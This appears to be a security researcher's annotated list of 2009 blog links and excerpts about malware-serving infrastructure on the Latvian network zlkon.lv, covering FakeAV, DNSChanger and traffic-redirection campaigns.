http://www.projecthoneypot.org/ip_94.247.2.29

McAfee Avert Labs Blog
Monday January 5, 2009
Explanation of the so-called “Traffic Management System” - Inside The Malicious Traffic Business
http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/
We also have a complete example here, from the visitor to the legitimate infected website (with logs, screenshots, IPs and analysis of the malicious website, as well as the techniques used, i.e. SUTRA traffic redirection, PDF exploit to inject backdoors, etc.).

Zeus Tracker
https://zeustracker.abuse.ch/monitor.php?host=94.247.3.211

Wednesday January 7, 2009
Google Code Project Abused by Spammers
http://www.avertlabs.com/research/blog/index.php/2009/01/07/google-code-project-abused-by-spammers/

January 19, 2009
Inaccurate whois details
http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx

January 2009
http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html
Paragraph: Sunbelt's Jordan said those responsible for DNSChanger appear to have begun moving to a new base of operations over the past few weeks, to a network in Latvia, called "Zlkon.lv."

http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html
http://ddanchev.blogspot.com/2009/02/template-ization-of-malware-serving.html

Paragraph from the ddanchev.blogspot.com:

Interestingly, within the mirrored copy now tweaked and distributed for free using free image hosting services as infrastructure provider for the layout, there are also leftovers from the original campaign template that they mirrored - which ultimately leads us to DATORU EXPRESS SERVISS Ltd (AS12553 PCEXPRESS-AS) or zlkon.lv In the wake of UkrTeleGroup Ltd's demise -- don't pop the corks just yet since the revenues they've been generating for the past several years will make it much less painful -- a significant number of UkrTeleGroup customer, of course under domains, have been generating quite some malicious activity at zlkon.lv for a while.

January 25, 2009
Rogue software - FakeAV
http://pandalabs.pandasecurity.com/archive/New-Rogue_3A00_-Total-Defender.aspx

February 5, 2009
Similar attack with the same code added between markers like <!-- ad --> <!-- /ad -->
(Same code here)
http://www.aladdin.com/AircBlog/post/2009/02/The-latest-undetected-malweb-by-RBN.aspx

Other: http://www.aladdin.com/AircBlog/post/2009/02/Iraq's-embassy-in-Tehran-website-compromised-by-hackers.aspx

Wednesday February 25, 2009
Google Trends Abused to Serve Malware
http://www.avertlabs.com/research/blog/index.php/2009/02/25/google-trends-abused-to-serve-malware/